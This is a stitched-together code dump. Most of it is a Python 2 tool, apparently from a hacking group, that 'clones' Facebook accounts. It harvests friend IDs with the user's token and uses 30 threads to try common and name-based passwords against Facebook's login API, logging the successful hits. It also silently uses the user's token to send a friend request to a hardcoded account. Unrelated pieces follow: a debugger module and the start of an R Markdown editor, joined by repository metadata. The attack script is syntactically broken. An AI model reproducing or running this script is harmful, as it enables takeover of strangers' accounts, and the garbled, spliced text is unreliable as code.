\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m╔★═█ \033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m🆁═══════╬█║▷\033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m┈┈┈┈┈┈┈┈┈┈\033[1;92m╚═█████▓▒█▒▓█████║〓\033[1;91m┈┈┈┈┈\033[1;92m▷Z K TECH
\033[1;91m ┈┈┈┈┈┈┈┈┈┈\033[1;92m○°◢███◤✇═╩═╩═╝╯🄵\033[1;91m┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈┈\033[1;92m◢███◤✬🄵🄰🄲🄴🄱🄾🄾🄺✬\033[1;91m┈┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈ \033[1;92m████║○○○○\033[1;91m┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;91m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈─────┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈
\033[1;93m•◈••◈••◈••◈••◈••◈••◈••◈•\033[1;92mWelcome To Kali.linux\033[1;93m•◈••◈••◈••◈••◈••◈••◈••◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;96mKali.linux\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•
\033[1;94m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀█\033[1;91m【I】【B】【R】【A】-【H】【I】【M】【A】【S】【H】\033[1;94m███▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀██\033[1;91m....03125939861....\033[1;94m█▀▀██▄██▀•◈•
\033[1;94m•◈•▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀▀██▄██▀•◈•
\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIBRAHIM_X_ASH\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"""
jalan(' \033[1;96m▀██▄██▀▀██▄██▀...IBRAHIM.ASH....▀██▄██▀▀██▄██▀.:')
jalan("\033[1;92m ▀██▄██▀▀██▄██▀•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•▀██▄██▀▀██▄██▀ ")
jalan('\033[1;93m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈ ')
jalan('\033[1;93m ┈┈┈┈┈┈\033[1;91m【I】【B】【R】【A】【H】【I】【M】【J】【I】\033[1;93m┈┈┈┈┈┈ ')
jalan("\033[1;93m ┈┈┈┈┈┈\033[1;91m.....03125939861....\033[1;93m┈┈┈┈┈┈┈┈┈ ")
jalan("\033[1;93m ┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈┈")
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mLogin IBRAHIM.ASH\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
CorrectUsername = "Ibrahim"
CorrectPassword = "Ashraf"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;91mTool Username \x1b[1;91m»» \x1b[1;92m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;91mTool Password \x1b[1;91m»» \x1b[1;92m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:IBRAHIM_CHANDIO
time.sleep(2)
loop = 'false'
else:
print "\033[1;93mWrong Password"
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA')
else:
print "\033[1;94mWrong Username"
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA')
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
jalan(' \033[1;91mWarning: \033[1;94mDo Not Use Your Personal Account' )
jalan(' \033[1;91m Note: \033[1;94mUse a New Account To Login' )
jalan(' \033[1;91mWarning: \033[1;94mlogin sy pehly Indonaeia ki proxy connect kr lein' )
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIBRAHIM.CHANDIO\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print(' \033[1;94m♡\x1b[1;91m✔✔✔✔✔✔✔LOGIN WITH FACEBOOK✔✔✔✔✔✔✔\x1b[1;94m♡' )
print(' ' )
id = raw_input('\033[1;96m[+] \x1b[1;92mID/Email\x1b[1;95m: \x1b[1;93m')
pwd = raw_input('\033[1;96m[+] \x1b[1;91mPassword\x1b[1;96m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\x1b[1;96mThere is no internet connection"
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;92mLogin Successful.•◈•..'
os.system('xdg-open https://www.youtube.com/channel/UChfXBYlQ3qW6KJQpIH601uA/')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\x1b[1;93mYour Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\x1b[1;94mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print"\x1b[1;91mToken invalid
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear") # Dev:ibrahim_ash
print logo
print " \033[1;92m«----•◈••◈•----\033[1;93mLogged in User Info\033[1;92m----•◈••◈•-----»"
print " \033[1;91m Name\033[1;93m:\033[1;92m"+nama+"\033[1;93m
print " \033[1;91m ID\033[1;93m:\033[1;92m" + id + "\x1b[1;93m
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mIbrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print "\033[1;97m-•◈•-\033[1;92m> \033[1;92m1.\x1b[1;92mStart Cloning..."
print "\033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91mExit
pilih()
def pilih():
unikers = raw_input("\n\033[1;91mChoose an Option>>> \033[1;97m")
if unikers == "":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers == "1":
super()
elif unikers == "0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError
print "\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m1.\x1b[1;95mClone From Friend List👬."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;92m2.\x1b[1;95mClone From Public ID👨👨👦👦."
print "\033[1;92m-•◈•-\033[1;91m> \033[1;91m0.\033[1;94mBack"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;94mChoose an Option>>> \033[1;97m")
if peak == "":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak == "1":
os.system('clear')
print logo
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
jalan('\033[1;95mGetting IDs \033[1;93m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token=" + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id']
elif peak == "2"
os.system('clear')
print logo
idt = raw_input("\033[1;96m[•◈•] \033[1;92mEnter ID\033[1;93m: \033[1;97m")
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
try:
jok = requests.get("https://graph.facebook.com/" + idt + "?access_token=" + toket)
op = json.loads(jok.text)
print "\033[1;93mName\033[1;93m:\033[1;97m " + op["name"]
except KeyError:
print "\x1b[1;92mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
print "\033[1;93mGetting IDs\033[1;92m..."
r = requests.get("https://graph.facebook.com/" + idt + "/friends?access_token=" + toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak == "0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;91mTotal IDs\033[1;93m: \033[1;94m" + str(len(id))
jalan('\033[1;92mPlease Wait\033[1;93m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print("\r\033[1;91mCloning\033[1;93m" + o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;92m«--•◈••◈•---\x1b[1;93m•◈•Stop Process Press CTRL+Z•◈•\033[1;92m---•◈••◈•-»"
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
jalan(' \033[1;93m........🔎🔎🔎🔎🔎🔎🔎🔎🔎🔎\033[1;94mCloning Start plzzz Wai\033[1;93m🔍🔍🔍🔍🔍🔍🔍🔍🔍🔍........ ')
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mKali.linux\033[1;95m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
def main(arg):
global cekpoint, oks
user = arg
try:
os.mkdir('out')
except OSError:
pass # Dev:ibrahim
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass1) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;94m✙\x1b[1;95m-' + pass1
oks.append(user + pass1)
else
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass1 + "\n")
cek.close()
cekpoint.append(user + pass1)
else:
pass2 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass2) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
oks.append(user + pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass2 + "\n")
cek.close()
cekpoint.append(user + pass2)
else:
pass3 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass3) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;97m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
oks.append(user + pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass3 + "\n")
cek.close()
cekpoint.append(user + pass3)
else:
pass4 = b['first_name'] + 'ali'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass4) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;94m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
oks.append(user + pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass4 + "\n")
cek.close()
cekpoint.append(user + pass4)
else:
pass5 = b['first_name'] + 'khan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass5) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
oks.append(user + pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass5 + "\n")
cek.close()
cekpoint.append(user + pass5)
else:
pass6 = '225588'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass6) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
oks.append(user + pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass6 + "\n")
cek.close()
cekpoint.append(user + pass6)
else:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass7 = b['full_name']
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + (user) + "&locale=en_US&password=" + (pass7) + "&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;91mHack💉\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
oks.append(user + pass7
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94mAfter7Days🗝\x1b[1;97m-\x1b[1;93m✙\x1b[1;96m-' + user + '-\x1b[1;93m✙\x1b[1;95m-' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user + "|" + pass7 + "\n")
cek.close()
cekpoint.append(user + pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•\033[1;91mibrahim.ash\033[1;92m•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•"
print " \033[1;93m«---•◈•---Developed By IBRAHIM CHANDIO--•◈•---»" #Dev:IBRAHIM.SH
print '\033[1;91m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 IBRAHIM)↩\033[1;92m....'
print"\033[1;91mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;91m"+str(len(oks))+"\033[1;97m/\033[1;92m"+str(len(cekpoint))
print """
┈┈┈╲┈┈┈┈╱┈┈┈
┈┈┈╱▔▔▔▔╲┈┈┈
┈┈┃┈▇┈┈▇┈┃┈┈┈
╭╮┣━━━━━━┫╭╮
┃┃┃┈┈┈┈┈┈┃┃┃
╰╯┃┈┈┈┈┈┈┃╰╯
┈┈╰┓┏━━┓┏╯┈┈
┈┈┈╰╯┈┈╰╯┈┈┈
•\033[1;92m◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•.
: \033[1;91m .....chandio brothers ibrahim.ashraf.panra........... \033[1;91m :
•\033[1;92m◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬•◈•.'
WhatsApp Num
\033[1;93m +92300923286"""
raw_input("\n\033[1;92m[\033[1;91mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
ceab03c4764ad7cac99e7e1fcadaca2cdc5da95a | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_custom_frames.py | 94cabd744e1d3785ac2a728ff2ac0c584fccdf39 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 4,397 | py | from _pydevd_bundle.pydevd_constants import get_current_thread_id, Null, ForkSafeLock
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame
from _pydev_imps._pydev_saved_modules import thread, threading
import sys
from _pydev_bundle import pydev_log
DEBUG = False
class CustomFramesContainer:
    """Module-level registry of "custom frames" shown by the debugger as paused threads.

    All values are placeholders here; they are (re)initialized by
    custom_frames_container_init(), including after a fork.
    """

    # Actual Values initialized later on.
    custom_frames_lock = None # : :type custom_frames_lock: threading.Lock
    # Maps frame-id string -> CustomFrame (access only while holding custom_frames_lock).
    custom_frames = None
    # Monotonic counter used to build unique frame ids.
    _next_frame_id = None
    # Event used to wake the debugger's command thread; a Null stub until the
    # real debugger installs its own event.
    _py_db_command_thread_event = None
def custom_frames_container_init(): # Note: no staticmethod on jython 2.1 (so, use free-function)
    """(Re)initialize all CustomFramesContainer state.

    Called once at import time below, and again when a fork is handled so the
    child process starts with a clean registry.
    """
    CustomFramesContainer.custom_frames_lock = ForkSafeLock()

    # custom_frames can only be accessed if properly locked with custom_frames_lock!
    # Key is a string identifying the frame (as well as the thread it belongs to).
    # Value is a CustomFrame.
    #
    CustomFramesContainer.custom_frames = {}

    # Only to be used in this module
    CustomFramesContainer._next_frame_id = 0

    # This is the event we must set to release an internal process events. It's later set by the actual debugger
    # when we do create the debugger.
    CustomFramesContainer._py_db_command_thread_event = Null()


# Initialize it the first time (it may be reinitialized later on when dealing with a fork).
custom_frames_container_init()
class CustomFrame:
    """Record describing one custom (virtual) frame registered for display."""

    def __init__(self, name, frame, thread_id):
        # Ident of the thread this frame is associated with.
        self.thread_id = thread_id
        # Human-readable name shown for the custom thread in the UI.
        self.name = name
        # The topmost frame object to present as paused.
        self.frame = frame
        # Bumped every time the stored frame is replaced (starts at zero).
        self.mod_time = 0
def add_custom_frame(frame, name, thread_id):
    '''
    It's possible to show paused frames by adding a custom frame through this API (it's
    intended to be used for coroutines, but could potentially be used for generators too).

    :param frame:
        The topmost frame to be shown paused when a thread with thread.ident == thread_id is paused.

    :param name:
        The name to be shown for the custom thread in the UI.

    :param thread_id:
        The thread id to which this frame is related (must match thread.ident).

    :return: str
        Returns the custom thread id which will be used to show the given frame paused.
    '''
    container = CustomFramesContainer
    with container.custom_frames_lock:
        calling_thread_id = get_current_thread_id(threading.current_thread())
        container._next_frame_id += 1
        new_id = container._next_frame_id
        # The id embeds both a unique counter and the registering thread, so a
        # later check can do frame_id.endswith('|' + thread_id) to match the
        # current thread.
        frame_custom_thread_id = '__frame__:%s|%s' % (new_id, calling_thread_id)
        if DEBUG:
            sys.stderr.write('add_custom_frame: %s (%s) %s %s\n' % (
                frame_custom_thread_id, get_abs_path_real_path_and_base_from_frame(frame)[-1], frame.f_lineno, frame.f_code.co_name))

        container.custom_frames[frame_custom_thread_id] = CustomFrame(name, frame, thread_id)
        container._py_db_command_thread_event.set()
    return frame_custom_thread_id
def update_custom_frame(frame_custom_thread_id, frame, thread_id, name=None):
    """Refresh a previously registered custom frame's metadata.

    Bumps the frame's mod_time and re-targets its thread id; optionally renames it.
    NOTE(review): the `frame` parameter is accepted but never stored here —
    presumably the caller keeps mutating the same frame object; confirm
    against the callers before relying on it.
    """
    with CustomFramesContainer.custom_frames_lock:
        if DEBUG:
            sys.stderr.write('update_custom_frame: %s\n' % frame_custom_thread_id)
        try:
            old = CustomFramesContainer.custom_frames[frame_custom_thread_id]
            if name is not None:
                old.name = name
            old.mod_time += 1
            old.thread_id = thread_id
        # Bare except kept: this is debugger plumbing that must never propagate;
        # the failure is logged instead.
        except:
            sys.stderr.write('Unable to get frame to replace: %s\n' % (frame_custom_thread_id,))
            pydev_log.exception()

        CustomFramesContainer._py_db_command_thread_event.set()
def remove_custom_frame(frame_custom_thread_id):
    """Drop a previously registered custom frame (silently a no-op if absent)."""
    container = CustomFramesContainer
    with container.custom_frames_lock:
        if DEBUG:
            sys.stderr.write('remove_custom_frame: %s\n' % frame_custom_thread_id)
        # pop with default: removal of an unknown id is not an error.
        container.custom_frames.pop(frame_custom_thread_id, None)
        container._py_db_command_thread_event.set()
| [
"davidycliao@gmail.com"
] | davidycliao@gmail.com |
ca40ea36db76c942c2481314570c212af410f345 | 5a2cd2517a6738105447909a4e8ecda07bc28647 | /inst/Python/WriteR/WriteR.pyw | 4e52929e0874a977aa0965fa727b6e75e15a5407 | [] | no_license | dewarren/BrailleR | e2f2a948832d94661e4da37cf0c813fda83e7561 | 5517918d36e61aade29e57f4ce706137fc697fed | refs/heads/master | 2020-12-02T06:29:52.684393 | 2017-10-02T01:41:41 | 2017-10-02T01:41:41 | 96,844,078 | 0 | 0 | null | 2017-07-11T02:56:05 | 2017-07-11T02:56:05 | null | UTF-8 | Python | false | false | 42,985 | pyw | # WriteR Version 0.1612.0
# development of this Python version left solely to Jonathan Godfrey from 8 March 2016 onwards
# a C++ version has been proposed for development in parallel, (led by James Curtis).
# cleaning taking place: any line starting with #- suggests a block of redundant code was removed.
# assistance from T.Bilton on 15 April 2016 to think about additions. More to come.
import wx
import sys
# import FileMenuEvents # problems with this one
import EditMenuEvents
import HelpMenuEvents
import MathInserts
import RMarkdownEvents
from wx.py.shell import Shell
from wx.aui import AuiManager, AuiPaneInfo
from threading import Thread, Event
from subprocess import Popen, PIPE, STDOUT
from os.path import join, split, isdir, expanduser, realpath
from os import walk
from time import asctime, sleep
# When True, the printing() helper echoes its arguments for debugging.
print_option = False
# set up some ID tags (wx.NewId() yields a unique int for each menu item)
ID_BUILD = wx.NewId()
ID_KNIT2HTML = wx.NewId()
ID_KNIT2PDF = wx.NewId()
ID_SETTINGS = wx.NewId()
ID_FINDONLY = wx.NewId()
ID_FINDREPLACE = wx.NewId()
ID_GOTO = wx.NewId()
ID_WORDCOUNT = wx.NewId()
# symbols menu for mathematical symbols
ID_SYMBOL_INFINITY = wx.NewId()
ID_SYMBOL_MINUSPLUS = wx.NewId()
ID_SYMBOL_PLUSMINUS = wx.NewId()
ID_SYMBOL_TIMES = wx.NewId()
ID_SYMBOL_PARTIAL = wx.NewId()
ID_SYMBOL_LEFTPAREN = wx.NewId()
ID_SYMBOL_RIGHTPAREN = wx.NewId()
ID_SYMBOL_LEFTSQUARE = wx.NewId()
ID_SYMBOL_RIGHTSQUARE = wx.NewId()
ID_SYMBOL_LEFTCURLY = wx.NewId()
ID_SYMBOL_RIGHTCURLY = wx.NewId()
ID_SYMBOL_GRTREQL = wx.NewId()
ID_SYMBOL_LESSEQL = wx.NewId()
ID_SYMBOL_NOTEQL = wx.NewId()
# R / R Markdown insertions (Stats menu)
ID_RCOMMAND = wx.NewId()
ID_RCHUNK = wx.NewId()
ID_RGRAPH = wx.NewId()
ID_RPIPE = wx.NewId()
ID_RLASSIGN = wx.NewId()
ID_RRASSIGN = wx.NewId()
# LaTeX math structures (Maths > Structures menu)
ID_SQUAREROOT = wx.NewId()
ID_MATHBAR = wx.NewId()
ID_ABSVAL = wx.NewId()
ID_FRACTION = wx.NewId()
ID_SUMMATION = wx.NewId()
ID_INTEGRAL = wx.NewId()
ID_PRODUCT = wx.NewId()
ID_LIMIT = wx.NewId()
ID_DOUBLESUMMATION = wx.NewId()
ID_DOUBLEINTEGRAL = wx.NewId()
# Greek menu for Greek letters
ID_GREEK_ALPHA = wx.NewId()
ID_GREEK_BETA = wx.NewId()
ID_GREEK_GAMMA = wx.NewId()
ID_GREEK_DELTA = wx.NewId()
ID_GREEK_EPSILON = wx.NewId()
ID_GREEK_VAREPSILON = wx.NewId()
ID_GREEK_ZETA = wx.NewId()
ID_GREEK_ETA = wx.NewId()
ID_GREEK_THETA = wx.NewId()
ID_GREEK_VARTHETA = wx.NewId()
ID_GREEK_IOTA = wx.NewId()
ID_GREEK_KAPPA = wx.NewId()
ID_GREEK_LAMBDA = wx.NewId()
ID_GREEK_MU = wx.NewId()
ID_GREEK_NU = wx.NewId()
ID_GREEK_XI = wx.NewId()
ID_GREEK_OMICRON = wx.NewId()
ID_GREEK_PI = wx.NewId()
ID_GREEK_RHO = wx.NewId()
ID_GREEK_SIGMA = wx.NewId()
ID_GREEK_TAU = wx.NewId()
ID_GREEK_UPSILON = wx.NewId()
ID_GREEK_PHI = wx.NewId()
ID_GREEK_CHI = wx.NewId()
ID_GREEK_PSI = wx.NewId()
ID_GREEK_OMEGA = wx.NewId()
# format menu items
ID_BOLD = wx.NewId()
ID_ITALIC = wx.NewId()
ID_MATH = wx.NewId()
ID_CODE = wx.NewId()
ID_RNDBRK = wx.NewId()
ID_SQBRK = wx.NewId()
ID_CRLBRK = wx.NewId()
ID_BRNDBRK = wx.NewId()
ID_BSQBRK = wx.NewId()
ID_BCRLBRK = wx.NewId()
# IDs for headings
ID_H1 = wx.NewId()
ID_H2 = wx.NewId()
ID_H3 = wx.NewId()
ID_H4 = wx.NewId()
ID_H5 = wx.NewId()
ID_H6 = wx.NewId()
# set up global text strings
SBText = "This program is for editing R Markdown files"
